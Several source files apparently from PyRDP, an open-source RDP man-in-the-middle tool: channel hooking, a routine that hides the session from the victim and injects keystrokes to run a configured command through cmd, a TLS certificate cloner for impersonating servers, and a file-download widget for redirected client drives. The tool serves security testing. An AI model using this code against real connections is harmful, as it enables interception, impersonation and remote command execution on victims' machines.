        clientLayer.addObserver(LayerLogger(self.getClientLog(MCSChannelName.DEVICE_REDIRECTION)))
        serverLayer.addObserver(LayerLogger(self.getServerLog(MCSChannelName.DEVICE_REDIRECTION)))

        if self.state.useTLS:
            LayerChainItem.chain(client, clientVirtualChannel, clientLayer)
            LayerChainItem.chain(server, serverVirtualChannel, serverLayer)
        else:
            clientSecurity = self.state.createSecurityLayer(ParserMode.SERVER, True)
            serverSecurity = self.state.createSecurityLayer(ParserMode.CLIENT, True)
            LayerChainItem.chain(client, clientSecurity, clientVirtualChannel, clientLayer)
            LayerChainItem.chain(server, serverSecurity, serverVirtualChannel, serverLayer)

        deviceRedirection = DeviceRedirectionMITM(clientLayer, serverLayer, self.getLog(MCSChannelName.DEVICE_REDIRECTION), self.statCounter, self.state, self.tcp)
        self.channelMITMs[client.channelID] = deviceRedirection

        if self.config.enableCrawler:
            self.crawler.setDeviceRedirectionComponent(deviceRedirection)

        if self.attacker:
            self.attacker.setDeviceRedirectionComponent(deviceRedirection)

    def buildVirtualChannel(self, client: MCSServerChannel, server: MCSClientChannel):
        """
        Build a generic MITM component for any virtual channel.
        :param client: MCS channel for the client side
        :param server: MCS channel for the server side
        """

        clientLayer = RawLayer()
        serverLayer = RawLayer()

        if self.state.useTLS:
            LayerChainItem.chain(client, clientLayer)
            LayerChainItem.chain(server, serverLayer)
        else:
            clientSecurity = self.state.createSecurityLayer(ParserMode.SERVER, True)
            serverSecurity = self.state.createSecurityLayer(ParserMode.CLIENT, True)
            LayerChainItem.chain(client, clientSecurity, clientLayer)
            LayerChainItem.chain(server, serverSecurity, serverLayer)

        mitm = VirtualChannelMITM(clientLayer, serverLayer, self.statCounter)
        self.channelMITMs[client.channelID] = mitm

    def sendPayload(self):
        if len(self.config.payload) == 0:
            return

        if self.config.payloadDelay is None:
            self.log.error("Payload was set but no delay is configured. Please configure a payload delay. Payload will not be sent for this connection.")
            return

        if self.config.payloadDuration is None:
            self.log.error("Payload was set but no duration is configured. Please configure a payload duration. Payload will not be sent for this connection.")
            return

        def waitForDelay() -> int:
            return self.config.payloadDelay

        def disableForwarding() -> int:
            self.state.forwardInput = False
            self.state.forwardOutput = False
            return 200

        def openRunWindow() -> int:
            self.attacker.sendKeys([ScanCode.LWIN, ScanCode.KEY_R])
            return 200

        def sendCMD() -> int:
            self.attacker.sendText("cmd")
            return 200

        def sendEnterKey() -> int:
            self.attacker.sendKeys([ScanCode.RETURN])
            return 200

        def sendPayload() -> int:
            return self.attacker.sendText(self.config.payload + " & exit")

        def waitForPayload() -> int:
            return self.config.payloadDuration

        def enableForwarding():
            self.state.forwardInput = True
            self.state.forwardOutput = True

        payload = sendPayload()
        sequencer = AsyncIOSequencer([
            waitForDelay,
            disableForwarding,
            openRunWindow,
            sendCMD,
            sendEnterKey,
            *payload,
            sendEnterKey,
            waitForPayload,
            enableForwarding
        ])
        sequencer.run()

    def ensureOutDir(self):
        self.config.outDir.mkdir(parents=True, exist_ok=True)
        self.config.replayDir.mkdir(exist_ok=True)
        self.config.fileDir.mkdir(exist_ok=True)
        self.config.certDir.mkdir(exist_ok=True)

    def addClientIpToLoggers(self, clientIp: str):
        """
        Add the client IP address to all relevant loggers.
        """
        self.log.extra['clientIp'] = self.state.clientIp
        self.clientLog.extra['clientIp'] = self.state.clientIp
        self.serverLog.extra['clientIp'] = self.state.clientIp
        self.attackerLog.extra['clientIp'] = self.state.clientIp
        self.rc4Log.extra['clientIp'] = self.state.clientIp

        self.x224.log.extra['clientIp'] = self.state.clientIp
        self.mcs.log.extra['clientIp'] = self.state.clientIp
        self.slowPath.log.extra['clientIp'] = self.state.clientIp

        if self.certs:
            self.certs.log.extra['clientIp'] = self.state.clientIp



#
# This file is part of the PyRDP project.
# Copyright (C) 2018, 2019, 2021 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from io import BytesIO

from pyrdp.core import Uint16LE, Uint32LE, Uint8
from pyrdp.enum import LicenseBinaryBlobType, LicenseErrorCode, LicensingPDUType, RDPStateTransition
from pyrdp.exceptions import UnknownPDUTypeError
from pyrdp.parser.parser import Parser
from pyrdp.pdu import LicenseBinaryBlob, LicenseErrorAlertPDU, LicensingPDU


class LicensingParser(Parser):
    """
    Parse the RDP Licensing part of the RDP connection sequence
    """

    def __init__(self):
        super().__init__()

        self.parsers = {
            LicensingPDUType.LICENSE_REQUEST: self.parseLicenseRequest,
            LicensingPDUType.PLATFORM_CHALLENGE: self.parsePlatformChallenge,
            LicensingPDUType.NEW_LICENSE: self.parseNewLicense,
            LicensingPDUType.UPGRADE_LICENSE: self.parseUpgradeLicense,
            LicensingPDUType.LICENSE_INFO: self.parseLicenseInfo,
            LicensingPDUType.NEW_LICENSE_REQUEST: self.parseNewLicenseRequest,
            LicensingPDUType.PLATFORM_CHALLENGE_RESPONSE: self.parsePlatformChallengeResponse,
            LicensingPDUType.ERROR_ALERT: self.parseErrorAlert,
        }

    def doParse(self, data):
        """
        Read the provided byte stream and return the corresponding RDPLicensingPDU.
        :type data: bytes
        :return: RDPLicensingPDU
        """

        stream = BytesIO(data)
        header = Uint8.unpack(stream)
        flags = Uint8.unpack(stream)
        size = Uint16LE.unpack(stream)

        if header not in self.parsers:
            raise UnknownPDUTypeError("Trying to parse unknown license PDU", header)

        return self.parsers[header](stream, flags)

    def parseLicenseBlob(self, stream):
        """
        Parse the provided byte stream and return the corresponding RDPLicenseBinaryBlob
        :type stream: BytesIO
        :return: RDPLicenseBinaryBlob
        """
        type = LicenseBinaryBlobType(Uint16LE.unpack(stream))
        length = Uint16LE.unpack(stream)
        data = stream.read(length)
        return LicenseBinaryBlob(type, data)

    def parseLicenseRequest(self, stream, flags):
        # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpele/a870d76a-639b-4757-9370-a9bdfbfd6961
        raise ("parseLicenseRequest isn't implemented yet")

    def parsePlatformChallenge(self, stream, flags):
        # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpele/3e78e067-83a8-42b5-b5b3-054679ade7c7
        raise ("parsePlatformChallenge isn't implemented yet")

    def parseNewLicense(self, stream, flags):
        # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpele/73c596f1-9550-4649-b880-2947c36c1bb6
        raise ("parseNewLicense isn't implemented yet")

    def parseUpgradeLicense(self, stream, flags):
        # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpele/94f9f260-fe9d-4429-b3b5-228bef28bc5d
        raise ("parseUpgradeLicense isn't implemented yet")

    def parseLicenseInfo(self, stream, flags):
        # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpele/9fea482b-f9e5-4175-9350-ac540a804eba
        raise ("parseLicenseInfo isn't implemented yet")

    def parseNewLicenseRequest(self, stream, flags):
        # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpele/9b4e7ee7-9e85-46f0-9583-77cfd397864e
        raise ("parseNewLicenseRequest isn't implemented yet")

    def parsePlatformChallengeResponse(self, stream, flags):
        # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpele/58e79794-58f8-4607-a510-c0b5fef49c40
        raise ("parsePlatformChallengeResponse isn't implemented yet")

    def parseErrorAlert(self, stream, flags):
        """
        Parse the provided byte stream and return the corresponding RDPLicenseErrorAlertPDU
        :type stream: BytesIO
        :param flags: The flags of the Licencing PDU.
        :return: RDPLicenseErrorAlertPDU
        """
        errorCode = LicenseErrorCode(Uint32LE.unpack(stream))
        stateTransition = RDPStateTransition(Uint32LE.unpack(stream))
        blob = self.parseLicenseBlob(stream)
        return LicenseErrorAlertPDU(flags, errorCode, stateTransition, blob)

    def write(self, pdu: LicensingPDU) -> bytes:
        """
        Encode a RDPLicensingPDU into a byte stream to send to the previous layer.
        """
        stream = BytesIO()
        stream.write(Uint8.pack(pdu.header))
        stream.write(Uint8.pack(pdu.flags))
        substream = BytesIO()

        if isinstance(pdu, LicenseErrorAlertPDU):
            self.writeErrorAlert(substream, pdu)
        else:
            raise UnknownPDUTypeError("Trying to write unknown RDP Licensing PDU: {}".format(pdu.header), pdu.header)

        stream.write(Uint16LE.pack(len(substream.getvalue()) + 4))
        stream.write(substream.getvalue())
        return stream.getvalue()

    def writeErrorAlert(self, stream, pdu):
        """
        Writes LicenceErrorAlertPDU-specific fields to stream
        :type stream: BytesIO
        :type pdu: LicenseErrorAlertPDU
        """
        stream.write(Uint32LE.pack(pdu.errorCode))
        stream.write(Uint32LE.pack(pdu.stateTransition))
        stream.write(Uint16LE.pack(pdu.blob.type))
        stream.write(Uint16LE.pack(0))



#
# Copyright (c) 2014-2015 Sylvain Peyrefitte
#
# This file is part of rdpy.
#
# rdpy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#

"""
Basic Encoding Rules utility functions.
ASN.1 standard.
"""

from enum import IntEnum
from typing import BinaryIO

from pyrdp.core.packing import Uint8, Uint16BE, Uint32BE

class PC(IntEnum):
    BER_PC_MASK = 0x20
    BER_PRIMITIVE = 0x00
    BER_CONSTRUCT = 0x20

class Class(IntEnum):
    BER_CLASS_MASK = 0xC0
    BER_CLASS_UNIV = 0x00
    BER_CLASS_APPL = 0x40
    BER_CLASS_CTXT = 0x80
    BER_CLASS_PRIV = 0xC0
        
class Tag(IntEnum):
    BER_TAG_MASK = 0x1F
    BER_TAG_BOOLEAN = 0x01
    BER_TAG_INTEGER = 0x02
    BER_TAG_BIT_STRING = 0x03
    BER_TAG_OCTET_STRING = 0x04
    BER_TAG_OBJECT_IDENFIER = 0x06
    BER_TAG_ENUMERATED = 0x0A
    BER_TAG_SEQUENCE = 0x10
    BER_TAG_SEQUENCE_OF = 0x10

def berPC(isConstruct: bool) -> PC:
    """
    Return BER_CONSTRUCT if true, BER_PRIMITIVE if false
    :param isConstruct: True if BER_CONSTRUCT expected
    :return: BERPC value
    """
    if isConstruct:
        return PC.BER_CONSTRUCT
    else:
        return PC.BER_PRIMITIVE
    
def readLength(s: BinaryIO) -> int:
    """
    Read length of BER structure
    Length is on 1, 2 or 3 bytes
    :param s: stream
    """

    byte = Uint8.unpack(s.read(1))
    if byte & 0x80:
        byte &= ~0x80

        if byte == 1:
            return Uint8.unpack(s.read(1))
        elif byte == 2:
            return Uint16BE.unpack(s.read(2))
        else:
            raise ValueError("BER length must be 1 or 2")
    else:
        return byte

def writeLength(length: int) -> bytes:
    """
    Pack structure length as expected in BER specification
    :param length: structure length.
    """
    if length > 0x7f:
        return Uint8.pack(0x82) + Uint16BE.pack(length)
    else:
        return Uint8.pack(length)
    
def readUniversalTag(s: BinaryIO, tag: Tag, isConstruct: bool) -> bool:
    """
    Unpack universal tag and return True if the proper tag was read.
    :param s: stream
    :param tag: BER tag
    :param isConstruct: True if a construct is expected
    """
    byte = Uint8.unpack(s.read(1))
    return byte == ((Class.BER_CLASS_UNIV | berPC(isConstruct)) | (Tag.BER_TAG_MASK & tag))

def writeUniversalTag(tag: Tag, isConstruct: bool) -> bytes:
    """
    Pack universal tag.
    :param tag: BER tag
    :param isConstruct: True if the structure is a construct
    """
    return Uint8.pack((Class.BER_CLASS_UNIV | berPC(isConstruct)) | (Tag.BER_TAG_MASK & tag))

def readApplicationTag(s: BinaryIO, tag: Tag) -> int:
    """
    Unpack an application tag and return the length of the application packet.
    :param s: stream
    :param tag: application tag.
    """
    byte = Uint8.unpack(s.read(1))
    
    if tag > 30:
        if byte != ((Class.BER_CLASS_APPL | PC.BER_CONSTRUCT) | Tag.BER_TAG_MASK):
            raise ValueError("Invalid BER tag")
        
        byte = Uint8.unpack(s.read(1))
        if byte != tag:
            raise ValueError("Unexpected application tag")
    else:
        if byte != ((Class.BER_CLASS_APPL | PC.BER_CONSTRUCT) | (tag & Tag.BER_TAG_MASK)):
            raise ValueError("Unexpected application tag")
        
    return readLength(s)

def writeApplicationTag(tag: Tag, size: int) -> bytes:
    """
    Pack an application tag.
    :param tag: application tag.
    :param size: the size of the application packet.
    """
    if tag > 30:
        return Uint8.pack((Class.BER_CLASS_APPL | PC.BER_CONSTRUCT) | Tag.BER_TAG_MASK) + Uint8.pack(tag) + writeLength(size)
    else:
        return Uint8.pack((Class.BER_CLASS_APPL | PC.BER_CONSTRUCT) | (Tag.BER_TAG_MASK & tag)) + writeLength(size)

def readContextualTag(s: BinaryIO, tag: Tag, isConstruct: bool) -> int:
    """
    Unpack contextual tag and return the tag length.
    :param s: stream
    :param tag: BER tag
    :param isConstruct: True if a construct is expected
    """
    byte = Uint8.unpack(s.read(1))
    if byte != ((Class.BER_CLASS_CTXT | berPC(isConstruct)) | (Tag.BER_TAG_MASK & tag)):
        raise ValueError("Unexpected contextual tag")
    return readLength(s)

def writeContextualTag(tag: Tag, size: int) -> bytes:
    """
    Pack contextual tag.
    :param tag: BER tag
    :param size: the size of the contextual packet.
    """
    return Uint8.pack((Class.BER_CLASS_CTXT | PC.BER_CONSTRUCT) | (Tag.BER_TAG_MASK & tag)) + writeLength(size)

def readBoolean(s: BinaryIO) -> bool:
    """
    Unpack a BER boolean
    :param s: stream
    """
    if not readUniversalTag(s, Tag.BER_TAG_BOOLEAN, False):
        raise ValueError("Bad boolean tag")

    size = readLength(s)
    if size != 1:
        raise ValueError("Bad boolean size")
    
    b = Uint8.unpack(s.read(1))
    return bool(b)

def writeBoolean(value: bool) -> bytes:
    """
    Pack a BER boolean
    """
    boolean = Uint8.pack(0xff if value else 0)
    return writeUniversalTag(Tag.BER_TAG_BOOLEAN, False) + writeLength(1) + boolean

def readInteger(s: BinaryIO) -> int:
    """
    Unpack a BER integer
    :param s: stream
    """
    if not readUniversalTag(s, Tag.BER_TAG_INTEGER, False):
        raise ValueError("Bad integer tag")
    
    size = readLength(s)
    
    if size == 1:
        return Uint8.unpack(s.read(1))
    elif size == 2:
        return Uint16BE.unpack(s.read(2))
    elif size == 3:
        integer1 = Uint8.unpack(s.read(1))
        integer2 = Uint16BE.unpack(s.read(2))
        return (integer1 << 16) + integer2
    elif size == 4:
        return Uint32BE.unpack(s.read(4))
    else:
        raise ValueError("Wrong integer size")
    
def writeInteger(value: int) -> bytes:
    """
    Pack a BER integer
    """
    if value <= 0xff:
        return writeUniversalTag(Tag.BER_TAG_INTEGER, False) + writeLength(1) + Uint8.pack(value)
    elif value <= 0xffff:
        return writeUniversalTag(Tag.BER_TAG_INTEGER, False) + writeLength(2) + Uint16BE.pack(value)
    else:
        return writeUniversalTag(Tag.BER_TAG_INTEGER, False) + writeLength(4) + Uint32BE.pack(value)

def readOctetString(s: BinaryIO) -> bytes:
    """
    Unpack a BER octet string
    :param s: stream
    """
    if not readUniversalTag(s, Tag.BER_TAG_OCTET_STRING, False):
        raise ValueError("Bad octet string tag")
    
    size = readLength(s)
    return s.read(size)

def writeOctetString(value: bytes) -> bytes:
    """
    Pack a BER octet string
    """
    return writeUniversalTag(Tag.BER_TAG_OCTET_STRING, False) + writeLength(len(value)) + value

def readEnumeration(s: BinaryIO) -> int:
    """
    Unpack a BER enumeration value
    :param s: stream
    """
    if not readUniversalTag(s, Tag.BER_TAG_ENUMERATED, False):
        raise ValueError("Bad enumeration tag")
    
    if readLength(s) != 1:
        raise ValueError("Enumeration size must be 1")
    
    return Uint8.unpack(s.read(1))

def writeEnumeration(value: int) -> bytes:
    """
    Pack a BER enumeration value
    """
    return writeUniversalTag(Tag.BER_TAG_ENUMERATED, False) + writeLength(1) + Uint8.pack(value)



#
# This file is part of the PyRDP project.
# Copyright (C) 2019, 2023 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from pathlib import Path
from typing import Optional

from PySide6.QtCore import QObject, QPoint, Qt, Signal
from PySide6.QtGui import QAction
from PySide6.QtWidgets import QFileDialog, QFrame, QLabel, QListWidget, QMenu, QMessageBox, QVBoxLayout, QWidget

from pyrdp.player.FileDownloadDialog import FileDownloadDialog
from pyrdp.player.filesystem import Directory, DirectoryObserver, File, FileSystemItemType
from pyrdp.player.FileSystemItem import FileSystemItem

import os

class FileSystemWidget(QWidget, DirectoryObserver):
    """
    Widget for listing directory contents and download files from the RDP client.
    """

    fileDownloadRequested = Signal(File, str, FileDownloadDialog)
    directoryDownloadRequested = Signal(Directory, str, FileDownloadDialog)

    def __init__(self, root: Directory, parent: QObject = None):
        """
        :param root: root of all directories. Directories in root will be displayed with drive icons.
        :param parent: parent object.
        """

        super().__init__(parent)
        self.root = root
        self.breadcrumbLabel = QLabel()

        self.titleLabel = QLabel()
        self.titleLabel.setStyleSheet("font-weight: bold")

        self.titleSeparator: QFrame = QFrame()
        self.titleSeparator.setFrameShape(QFrame.HLine)

        self.listWidget = QListWidget()
        self.listWidget.setSortingEnabled(True)
        self.listWidget.setContextMenuPolicy(Qt.CustomContextMenu)
        self.listWidget.customContextMenuRequested.connect(self.onCustomContextMenu)

        self.verticalLayout = QVBoxLayout()
        self.verticalLayout.addWidget(self.breadcrumbLabel)
        self.verticalLayout.addWidget(self.listWidget)

        self.setLayout(self.verticalLayout)
        self.listWidget.itemDoubleClicked.connect(self.onItemDoubleClicked)

        self.currentPath: Path = Path("/")
        self.currentDirectory: Directory = root
        self.listCurrentDirectory()

        self.currentDirectory.addObserver(self)

    def setWindowTitle(self, title: str):
        """
        Set the window title. When the title is not blank, a title label and a separator is displayed.
        :param title: the new title.
        """

        previousTitle = self.windowTitle()

        super().setWindowTitle(title)

        self.titleLabel.setText(title)

        if previousTitle == "" and title != "":
            self.verticalLayout.insertWidget(0, self.titleLabel)
            self.verticalLayout.insertWidget(1, self.titleSeparator)
        elif title == "" and previousTitle != "":
            self.verticalLayout.removeWidget(self.titleLabel)
            self.verticalLayout.removeWidget(self.titleSeparator)

            # noinspection PyTypeChecker
            self.titleLabel.setParent(None)

            # noinspection PyTypeChecker
            self.titleSeparator.setParent(None)

    def onItemDoubleClicked(self, item: FileSystemItem):
        """
        Handle double-clicks on items in the list. When the item is a directory, the current path changes and the
        contents of the directory are listed. Files are ignored.
        :param item: the item that was clicked.
        """

        if not item.isDirectory() and not item.isDrive():
            return

        if item.text() == "..":
            self.currentPath = self.currentPath.parent
        else:
            self.currentPath = self.currentPath / item.text()

        self.listCurrentDirectory()


    def listCurrentDirectory(self):
        """
        Refresh the list widget with the current directory's contents.
        """

        node = self.root

        for part in self.currentPath.parts[1 :]:
            node = next(d for d in node.directories if d.name == part)

        self.listWidget.clear()
        self.breadcrumbLabel.setText(f"Location: {str(self.currentPath)}")

        if node != self.root:
            self.listWidget.addItem(FileSystemItem("..", FileSystemItemType.Directory))

        for directory in node.directories:
            self.listWidget.addItem(FileSystemItem(directory.name, directory.type))

        for file in node.files:
            self.listWidget.addItem(FileSystemItem(file.name, file.type))

        if node is not self.currentDirectory:
            self.currentDirectory.removeObserver(self)
            node.addObserver(self)
            self.currentDirectory = node
            node.list()

    def onDirectoryChanged(self):
        """
        Refresh the directory view when the directory has changed.
        """

        self.listCurrentDirectory()

    def currentItemText(self) -> str:
        try:
            return self.listWidget.selectedItems()[0].text()
        except IndexError:
            return ""

    def selectedFile(self) -> Optional[File]:
        text = self.currentItemText()

        if text == "":
            return None

        if text == "..":
            return self.currentDirectory.parent

        for sequence in [self.currentDirectory.files, self.currentDirectory.directories]:
            for file in sequence:
                if text == file.name:
                    return file

        return None

    def canDownloadSelectedItem(self) -> bool:
        return self.selectedFile().type == FileSystemItemType.File

    def onCustomContextMenu(self, localPosition: QPoint):
        """
        Show a custom context menu with a "Download file" action when a file is right-clicked.
        :param localPosition: position where the user clicked.
        """
        selectedFile = self.selectedFile()

        if selectedFile is None:
            return

        globalPosition = self.listWidget.mapToGlobal(localPosition)

        downloadAction = QAction("Download file")
        downloadAction.setEnabled(selectedFile.type in [FileSystemItemType.File])
        downloadAction.triggered.connect(self.downloadFile)

        downloadRecursiveAction = QAction("Download files recursively")
        downloadRecursiveAction.setEnabled(selectedFile.type in [FileSystemItemType.Directory])
        downloadRecursiveAction.triggered.connect(self.downloadDirectoryRecursively)

        itemMenu = QMenu()
        itemMenu.addAction(downloadAction)
        itemMenu.addAction(downloadRecursiveAction)

        itemMenu.exec_(globalPosition)

    def downloadFile(self):
        file = self.selectedFile()

        if file.type != FileSystemItemType.File:
            return

        filePath = file.getFullPath()
        targetPath, _ = QFileDialog.getSaveFileName(self, f"Download file {filePath}", file.name)

        if targetPath == "":
            QMessageBox.critical(self, "Download file", "Please select a valid file. Aborting download.")
            return

        dialog = FileDownloadDialog(filePath, targetPath, False, self)
        dialog.incrementDownloadTotal()
        dialog.show()

        self.fileDownloadRequested.emit(file, targetPath, dialog)

    def downloadDirectoryRecursively(self):
        selectedFolder = self.selectedFile()

        if selectedFolder.type != FileSystemItemType.Directory:
            return

        directoryPath = QFileDialog.getExistingDirectory(self, f"Download folder {selectedFolder.getFullPath()}")
        remotePath = selectedFolder.getFullPath()

        dialog = None
        if directoryPath == "":
            QMessageBox.critical(self, "Download folder", "Please select a valid folder. Aborting download.")
            return

        directoryPath += f"/{selectedFolder.name}"

        try:
            os.mkdir(directoryPath)
        except FileExistsError:
            QMessageBox.critical(self, "Download folder", "Folder already exist. Make sure to select an empty directory. Aborting download.")
            return

        dialog = FileDownloadDialog(remotePath, directoryPath, True, self)
        dialog.show()

        self.directoryDownloadRequested.emit(selectedFolder, directoryPath, dialog)



#
# This file is part of the PyRDP project.
# Copyright (C) 2018 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from io import BytesIO


class ByteStream(BytesIO):
    """
    Stream used to read bytes.
    """


class StrictStream:
    """
    Stream wrapper class that throws an EOFError when it reads fewer bytes than required.
    """
    def __init__(self, stream: BytesIO):
        self.stream = stream

    def read(self, length: int):
        """
        Read data from the stream and raise an EOFError if not enough bytes were read.
        :param length: the amount of bytes to read.
        :raises EOFError: when not enough data was read.
        """
        data = self.stream.read(length)

        if len(data) != length:
            raise EOFError("Expected to read %d bytes, got %d bytes instead" % (length, len(data)))

        return data


#!/usr/bin/env python3

#
# This file is part of the PyRDP project.
# Copyright (C) 2018-2023 GoSecure Inc.
# Licensed under the GPLv3 or later.
#
# Need to install this reactor before importing any other code
# ruff: noqa: E402
import asyncio
import sys
# We need a special asyncio loop on Windows above Python 3.8. See #316
if (sys.platform == "win32" and sys.version_info.major == 3 and sys.version_info.minor >= 8):
    asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
from twisted.internet import asyncioreactor
asyncioreactor.install(asyncio.new_event_loop())

import argparse
import logging
import sys

import OpenSSL
from twisted.application.reactors import Reactor
from twisted.internet import reactor
from twisted.internet.endpoints import HostnameEndpoint
from twisted.internet.protocol import ClientFactory

from pyrdp.core.ssl import ClientTLSContext
from pyrdp.enum import NegotiationProtocols
from pyrdp.layer import TPKTLayer, TwistedTCPLayer, X224Layer, LayerChainItem
from pyrdp.logging import LOGGER_NAMES
from pyrdp.parser.rdp.negotiation import NegotiationRequestParser
from pyrdp.pdu.rdp.negotiation import NegotiationRequestPDU


class TCPCertFetchingLayer(TwistedTCPLayer):
    """
    TCP layer that saves the TLS certificate after startTLS is complete, then shuts down Twisted.
    """

    def __init__(self):
        super().__init__()
        self.cert: OpenSSL.crypto.X509 = None

    def logSSLParameters(self):
        # We don't need this in this tool.
        pass

    def startTLS(self, tlsContext):
        TwistedTCPLayer.startTLS(self, tlsContext)

        # Callback in a couple seconds to inspect the TLS certificate
        reactor.callLater(2, self.saveCertificate)

    def saveCertificate(self):
        self.cert = self.transport.getPeerCertificate()
        reactor.stop()


class CertFetcher(ClientFactory):
    """
    Client factory that orchestrates the certificate fetching.
    """

    def __init__(self, _reactor: Reactor, host: str, port: int):
        self.reactor = _reactor
        self.host = host
        self.port = port
        self.log = logging.getLogger(f"{LOGGER_NAMES.PYRDP}.clonecert")
        self.tcp = TCPCertFetchingLayer()
        self.tpkt = TPKTLayer()
        self.x224 = X224Layer()

        LayerChainItem.chain(self.tcp, self.tpkt, self.x224)
        self.tcp.createObserver(onConnection=self.sendConnectionRequest)
        self.x224.createObserver(onConnectionConfirm=lambda _: self.startTLS())

    def buildProtocol(self, addr):
        return self.tcp

    def fetch(self):
        endpoint = HostnameEndpoint(reactor, self.host, self.port)
        endpoint.connect(self)
        self.reactor.run()

        return self.tcp.cert

    def sendConnectionRequest(self):
        self.log.info("Connected to RDP server")

        negotiationRequest = NegotiationRequestPDU(None, 0, NegotiationProtocols.SSL | NegotiationProtocols.CRED_SSP)
        negoParser = NegotiationRequestParser()
        payload = negoParser.write(negotiationRequest)
        self.x224.sendConnectionRequest(payload)

    def startTLS(self):
        self.log.info("Starting TLS")
        self.tcp.startTLS(ClientTLSContext())


def prepareLoggers(logLevel: int):
    formatter = logging.Formatter("[{asctime}] - {levelname} - {name} - {message}", style = "{")

    streamHandler = logging.StreamHandler()
    streamHandler.setFormatter(formatter)

    pyrdpLogger = logging.getLogger(LOGGER_NAMES.PYRDP)
    pyrdpLogger.addHandler(streamHandler)
    pyrdpLogger.setLevel(logLevel)


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("host", help="RDP host to clone")
    parser.add_argument("out_file", help="Output certificate file name")
    parser.add_argument("-p", "--port", help="RDP port of the host (default 3389)", default=3389, type=int)
    parser.add_argument("-L", "--log-level", help="Log level (default: INFO)", default="INFO", choices=["DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"], nargs="?")

    keyGroup = parser.add_mutually_exclusive_group(required=True)
    keyGroup.add_argument("-o", "--out-key", help="Path used when saving the generated private key")
    keyGroup.add_argument("-i", "--in-key", help="Private key to use when signing the fake certificate (default: generate a new key)")

    arguments = parser.parse_args()

    if arguments.port < 1 or arguments.port > 65535:
        print("Port must be a number between 1 and 65535", file=sys.stderr)
        sys.exit(1)

    key: OpenSSL.crypto.PKey = None

    if arguments.in_key is not None:
        try:
            with open(arguments.in_key, "rb") as f:
                keyBytes = f.read()
        except IOError as e:
            print(f"Input key: {e}", file=sys.stderr)
            sys.exit(1)

        key = OpenSSL.crypto.load_privatekey(OpenSSL.crypto.FILETYPE_PEM, keyBytes)

    logLevel = getattr(logging, arguments.log_level)
    prepareLoggers(logLevel)
    clonerLog = logging.getLogger(f"{LOGGER_NAMES.PYRDP}.clonecert")

    cloner = CertFetcher(reactor, arguments.host, arguments.port)
    cert = cloner.fetch()

    if not key:
        key = OpenSSL.crypto.PKey()
        key.generate_key(OpenSSL.crypto.TYPE_RSA, cert.get_pubkey().bits())
    else:
        if key.bits() != cert.get_pubkey().bits():
            clonerLog.warning("Input and server key bits are different: input: %(inBits)d bits, server: %(serverBits)d. You may want to use a key that matches the server.", {
                "inBits": key.bits(),
                "serverBits": cert.get_pubkey().bits()
            })

    # Actual type is str, but this prevents warnings
    digestAlgorithm: bytes = cert.get_signature_algorithm().decode()

    if digestAlgorithm in ["md4", "md5"]:
        defaultDigestAlgorithm = "sha256"

        answer = input(
            f"The digest algorithm used by the server ('{digestAlgorithm}') is too weak and will not work with the PyRDP MITM. " +
            f"Do you want to change the digest algorithm to {defaultDigestAlgorithm}? [Y/n]"
        )

        if answer == "" or answer[0].upper() == "Y":
            clonerLog.info(f"Digest algorithm changed from {digestAlgorithm} to {defaultDigestAlgorithm}")
            digestAlgorithm = defaultDigestAlgorithm

    cert.set_pubkey(key)
    cert.sign(key, digestAlgorithm)

    clonerLog.info("Saving certificate to %(certPath)r", {"certPath": arguments.out_file})

    try:
        with open(arguments.out_file, "wb") as f:
            f.write(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, cert))
    except IOError as e:
        print(f"Output file: {e}", file=sys.stderr)
        sys.exit(1)

    if arguments.out_key is not None:
        clonerLog.info("Saving private key to %(keyPath)r", {"keyPath": arguments.out_key})

        try:
            with open(arguments.out_key, "wb") as f:
                f.write(OpenSSL.crypto.dump_privatekey(OpenSSL.crypto.FILETYPE_PEM, key))
        except IOError as e:
            print(f"Output key: {e}", file=sys.stderr)
            sys.exit(1)


if __name__ == "__main__":
    main()


#
# This file is part of the PyRDP project.
# Copyright (C) 2021 GoSecure Inc.
# Licensed under the GPLv3 or later.
#
from pathlib import Path


class Converter:
    def __init__(self, inputFile: Path, outputPrefix: str, format: str):
        self.inputFile = inputFile
        self.outputPrefix = outputPrefix
        self.format = format

    def process(self):
        raise NotImplementedError("Converter.process is not implemented")



#
# This file is part of the PyRDP project.
# Copyright (C) 2019 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from pathlib import Path
from typing import BinaryIO

from pyrdp.core.observer import Observer
from pyrdp.core.subject import ObservedBy, Subject


class FileProxyObserver(Observer):
    """
    Observer class for receiving FileProxy events (file creation and file close).
    """

    def onFileCreated(self, fileProxy: 'FileProxy'):
        pass

    def onFileClosed(self, fileProxy: 'FileProxy'):
        pass


@ObservedBy(FileProxyObserver)
class FileProxy(Subject):
    """
    Proxy object that waits until a file is accessed before creating it.
    """

    def __init__(self, path: Path, mode: str):
        """
        :param path: path of the file
        :param mode: file opening mode
        """
        super().__init__()

        self.path = path
        self.mode = mode
        self.file: BinaryIO = None

    def createFile(self):
        """
        Create the file and overwrite this object's methods with the file object's methods.
        """

        if self.file is None:
            self.file = open(str(self.path), self.mode)
            self.write = self.file.write
            self.seek = self.file.seek
            self.close = self.file.close

            self.observer.onFileCreated(self)

    def write(self, *args, **kwargs):
        self.createFile()
        self.file.write(*args, **kwargs)

    def seek(self, *args, **kwargs):
        self.createFile()
        self.file.seek(*args, **kwargs)

    def close(self):
        if self.file is not None:
